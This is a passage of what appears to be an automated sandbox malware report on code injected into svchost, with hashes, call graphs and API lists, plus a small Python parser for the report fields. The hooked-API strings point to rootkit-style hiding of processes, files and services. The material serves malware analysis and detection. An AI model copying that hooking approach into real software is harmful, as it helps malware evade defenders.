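• Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction ID: fd0772b57a10f5ee3d03dfca06ca8f8fdafda8dc318c2fb514941a215750b28d
• Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction Fuzzy Hash: 7151D236188380CAFB648BD59081BBC77A0F355B8AF046116DA5FC7B95CBBBC450C798
Memory Dump Source
• Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: 912d26b72c26ad93e34c569596d669a6ded88d197370947b8223babb3ee4b667
• Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction Fuzzy Hash: 9511B235605B4495FA05CBE6A485ABAB3A1F789FCAF085028CE4F87765DF3BC446C380
"""

FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")       # one "• Key: value" bullet
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")    # dump base inside "Source File"


def parse_records(text):
    """Start a new record at each 'Memory Dump Source' header and collect the
    bullet fields of that record into a dict; non-bullet lines are ignored."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return records


def dump_offset(record):
    """Base address of the dump the record was taken from, or None."""
    m = OFFSET.search(record.get("Source File", ""))
    return m.group(1).upper() if m else None


def recurring_opcodes(records):
    """Opcode IDs present in more than one dumped region, with those regions."""
    regions = defaultdict(set)
    for rec in records:
        oid, off = rec.get("Opcode ID"), dump_offset(rec)
        if oid and off:
            regions[oid].add(off)
    return {oid: sorted(offs) for oid, offs in regions.items() if len(offs) > 1}


def api_ids_by_region(records):
    """Distinct 'API ID' strings the report assigned to functions in each region."""
    out = defaultdict(set)
    for rec in records:
        off = dump_offset(rec)
        if off and rec.get("API ID"):
            out[off].add(rec["API ID"])
    return {off: sorted(ids) for off, ids in out.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for oid, offs in recurring_opcodes(recs).items():
        print(f"{oid[:16]}... present in {len(offs)} regions: {', '.join(offs)}")
```

Run against a whole report export, the recurring-opcode map is what to compare across analyses: the Opcode ID survives the relocation that changes the Instruction ID, so it is the field to pivot on.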

                                                                      Execution Graph

                                                                      Execution Coverage:0.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:66
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph
                                                                      14702 1f2bd13273c
                                                                      14703 1f2bd13276a
                                                                      14702->14703
                                                                      14704 1f2bd132858 LoadLibraryA
                                                                      14703->14704
                                                                      14705 1f2bd1328d4
                                                                      14703->14705
                                                                      14704->14703
                                                                      14706 1f2bd161abc
                                                                      14711 1f2bd161628 GetProcessHeap HeapAlloc
                                                                      14706->14711
                                                                      14708 1f2bd161ad2 Sleep SleepEx
                                                                      14709 1f2bd161acb
                                                                      14708->14709
                                                                      14709->14708
                                                                      14710 1f2bd161598 StrCmpIW StrCmpW
                                                                      14709->14710
                                                                      14710->14709
                                                                      14755 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc
                                                                      14711->14755
                                                                      14713 1f2bd161650
                                                                      14756 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc
                                                                      14713->14756
                                                                      14715 1f2bd161661
                                                                      14757 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc
                                                                      14715->14757
                                                                      14717 1f2bd16166a
                                                                      14758 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc
                                                                      14717->14758
                                                                      14719 1f2bd161673
                                                                      14720 1f2bd16168e RegOpenKeyExW
                                                                      14719->14720
                                                                      14721 1f2bd1618a6
                                                                      14720->14721
                                                                      14722 1f2bd1616c0 RegOpenKeyExW
                                                                      14720->14722
                                                                      14721->14709
                                                                      14723 1f2bd1616e9
                                                                      14722->14723
                                                                      14724 1f2bd1616ff RegOpenKeyExW
                                                                      14722->14724
                                                                      14759 1f2bd1612bc RegQueryInfoKeyW
                                                                      14723->14759
                                                                      14726 1f2bd161723
                                                                      14724->14726
                                                                      14727 1f2bd16173a RegOpenKeyExW
                                                                      14724->14727
                                                                      14768 1f2bd16104c RegQueryInfoKeyW
                                                                      14726->14768
                                                                      14728 1f2bd161775 RegOpenKeyExW
                                                                      14727->14728
                                                                      14729 1f2bd16175e
                                                                      14727->14729
                                                                      14733 1f2bd161799
                                                                      14728->14733
                                                                      14734 1f2bd1617b0 RegOpenKeyExW
                                                                      14728->14734
                                                                      14732 1f2bd1612bc 16 API calls
                                                                      14729->14732
                                                                      14736 1f2bd16176b RegCloseKey
                                                                      14732->14736
                                                                      14737 1f2bd1612bc 16 API calls
                                                                      14733->14737
                                                                      14738 1f2bd1617d4
                                                                      14734->14738
                                                                      14739 1f2bd1617eb RegOpenKeyExW
                                                                      14734->14739
                                                                      14736->14728
                                                                      14740 1f2bd1617a6 RegCloseKey
                                                                      14737->14740
                                                                      14741 1f2bd1612bc 16 API calls
                                                                      14738->14741
                                                                      14742 1f2bd161826 RegOpenKeyExW
                                                                      14739->14742
                                                                      14743 1f2bd16180f
                                                                      14739->14743
                                                                      14740->14734
                                                                      14746 1f2bd1617e1 RegCloseKey
                                                                      14741->14746
                                                                      14744 1f2bd161861 RegOpenKeyExW
                                                                      14742->14744
                                                                      14745 1f2bd16184a
                                                                      14742->14745
                                                                      14747 1f2bd16104c 6 API calls
                                                                      14743->14747
                                                                      14749 1f2bd161885
                                                                      14744->14749
                                                                      14750 1f2bd16189c RegCloseKey
                                                                      14744->14750
                                                                      14748 1f2bd16104c 6 API calls
                                                                      14745->14748
                                                                      14746->14739
                                                                      14751 1f2bd16181c RegCloseKey
                                                                      14747->14751
                                                                      14752 1f2bd161857 RegCloseKey
                                                                      14748->14752
                                                                      14753 1f2bd16104c 6 API calls
                                                                      14749->14753
                                                                      14750->14721
                                                                      14751->14742
                                                                      14752->14744
                                                                      14754 1f2bd161892 RegCloseKey
                                                                      14753->14754
                                                                      14754->14750
                                                                      14755->14713
                                                                      14756->14715
                                                                      14757->14717
                                                                      14758->14719
                                                                      14760 1f2bd161327 GetProcessHeap HeapAlloc
                                                                      14759->14760
                                                                      14761 1f2bd16148a RegCloseKey
                                                                      14759->14761
                                                                      14762 1f2bd161476 GetProcessHeap HeapFree
                                                                      14760->14762
                                                                      14763 1f2bd161352 RegEnumValueW
                                                                      14760->14763
                                                                      14761->14724
                                                                      14762->14761
                                                                      14764 1f2bd1613a5
                                                                      14763->14764
                                                                      14764->14762
                                                                      14764->14763
                                                                      14766 1f2bd1613d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree
                                                                      14764->14766
                                                                      14767 1f2bd16141e lstrlenW GetProcessHeap HeapAlloc StrCpyW
                                                                      14764->14767
                                                                      14773 1f2bd16152c
                                                                      14764->14773
                                                                      14766->14767
                                                                      14767->14764
                                                                      14769 1f2bd1611b5 RegCloseKey
                                                                      14768->14769
                                                                      14771 1f2bd1610bf
                                                                      14768->14771
                                                                      14769->14727
                                                                      14770 1f2bd1610cf RegEnumValueW
                                                                      14770->14771
                                                                      14771->14769
                                                                      14771->14770
                                                                      14772 1f2bd16114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree
                                                                      14771->14772
                                                                      14772->14771
                                                                      14774 1f2bd16157c
                                                                      14773->14774
                                                                      14777 1f2bd161546
                                                                      14773->14777
                                                                      14774->14764
                                                                      14775 1f2bd161565 StrCmpW
                                                                      14775->14777
                                                                      14776 1f2bd16155d StrCmpIW
                                                                      14776->14777
                                                                      14777->14774
                                                                      14777->14775
                                                                      14777->14776

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: b8f2d5d8970c08e30104490078ba1f72add17956867f785404ba5962f5222235
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: 02118078A30A4382FB609B61F8393F923E4B754B45FD88238ED06815B1EF79C044C203

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001F2BD161628: GetProcessHeap.KERNEL32 ref: 000001F2BD161633
                                                                        • Part of subcall function 000001F2BD161628: HeapAlloc.KERNEL32 ref: 000001F2BD161642
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616B2
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616DF
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1616F9
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161719
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161734
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161754
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16176F
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16178F
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617AA
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1617CA
                                                                      • Sleep.KERNEL32 ref: 000001F2BD161AD7
                                                                      • SleepEx.KERNELBASE ref: 000001F2BD161ADD
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617E5
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161805
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161820
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161840
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16185B
                                                                        • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16187B
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161896
                                                                        • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1618A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: dbf663d1485315679b68e8288550e8b7b0c6c51f1b1d89a94094fb3e67a57733
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 7731B97922464382EB509B26EA713F973B5AB85BC0F985835DE0A87695FF34C8D18312

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dialer
                                                                      • API String ID: 0-3528709123
                                                                      • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction ID: 3aac585823334c127dda7282b47a4669109186ccc3810c2214bda50ad0b13ecd
                                                                      • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction Fuzzy Hash: 81D05EB43216078AFB549FE698E46F02354AB08744FCC4134CD0441160DB38898DE611

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574440743.000001F2BD130000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD130000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd130000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 5a31c6780180920593c79de93fd5a78e32e1db436847973b0c6c9579bd3f76a4
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: CB61EF32B216A297EF54AF1590207FDB3A2FB54BA4F98C131DE5907788DA38D852C701

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 107207480c6beedcfac9e10622a0404f813cce9df297bff4ecca76f0d2a71204
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 16B18D7A231A9386EB69CF25D4607F963A5FB44B94F845036EE4953B94EF35CC80C342
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 2191b91c7ae414d5341e28445c4bdcd7f9ae6a593b554c58698db7f92569058a
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: AB314F76215B828AEBA49F60E8607FD7364F784748F84443ADE4D57B98EF38C548C711

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 630f6eb47bae6733bdbe7fb6a2d06b5e13df8154db8fa66121e5b802eb99e1ef
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: C6515BB6220B8686EB54CF62E4683EA77A1F789B99F844134DE4907B29DF3CC445C701

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 44394e3bb61418d90b21b3d16070fd92066106fc5670cf8bb63d378dec672435
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: F5318CB9635A4BA0EB05EBAAE8716F42321B705394FC05073EC1D135B6AF78828DC352

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: d5e0ca40e81d9d4a17391a4d0fb4706baa6880c7b00ec249b536ae7b7c49b8b2
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: BDE1F57A621B838AEB20DF65D4603FD77A4F744B98F900126EF8957B9ACB34D481C706

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: dee3e0f77a7f950d99e87eba1c700eb07d10c10f3303d0f797124f3aba53c511
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 1241DE76336A0381EB16CB66A8247F52395FB49BE0F894139DD0A87B99EE38C445C352

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 4129ac803274aa25b024b198ef83d0f7a517cdb801d32a117a9186af29447f03
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: 9D4171B7224B86C6E7A0CF61E4543EE77A1F389B98F448129DE8907B58DF38C485CB01
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001F2BD16C7DE,?,?,?,?,?,?,?,?,000001F2BD16CF9D,?,?,00000001), ref: 000001F2BD16D0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 43319ffa0c7ee914352e92ba5d38087bee9b4dd8faa5ceab62ab6c6d6a778b8b
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 4611D03872528341FB68A7755A713F923416B443F0FA84734ED3D066EADE78C442A303
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 96eb2be9ce1bb00abb2c46e894f9b4b09165b72cda165d31dba4d8d7e2e0f222
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: E981C37973064386FB50AB65A4713F96390A785780FD88535EE0847FAEEB78C845C723
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 816ff74fe6477f5732722e6092750f562cc341bf4d63a227298854922a383655
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: ED31C339362A43E2EF51DF46A4207F52394B748BA0F990535DD2E4B790DF38C6458302
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: d3eef95f8e9797c62bd303372fc9d1d98ec5d0db309b4e4d04cd5f80355460af
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: D8113C7A724B4382FF549B61E4282F963A4F789B85F880139DE8907764EF3DC505C705
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: ee09959155a2eac8c82d5250b8b01ccc16e451735121b4104c9fa91c9d301f77
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: 42D18F7A215B8A81EB70DB15E4943EA7BA0F388B84F500126EECD47BA5DF3DC551CB01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 7f80d1afa80db319671d8072da7637dd5eac392f218b8f1172c2418ba6a9fafe
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 43319C3A721B53C2EB54CF66A5647FAA7A0FB44B84F888030DE4847B65EF38C4A5C701
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 9acd306c796429d848d5f20ad6bad8694a47334f45623fd279d62bd0269b48f1
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: F811AF3826628381FB64A7715A753F923526B987F0FA00734ED3A477E6DE78C4429703
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
